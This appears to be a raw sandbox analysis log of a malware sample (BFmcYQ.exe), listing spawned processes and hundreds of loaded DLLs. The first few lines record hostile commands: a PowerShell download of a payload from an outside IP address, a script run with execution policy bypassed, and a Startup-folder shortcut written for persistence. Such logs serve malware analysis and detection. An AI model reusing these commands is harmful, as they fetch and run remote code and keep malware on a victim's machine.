Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
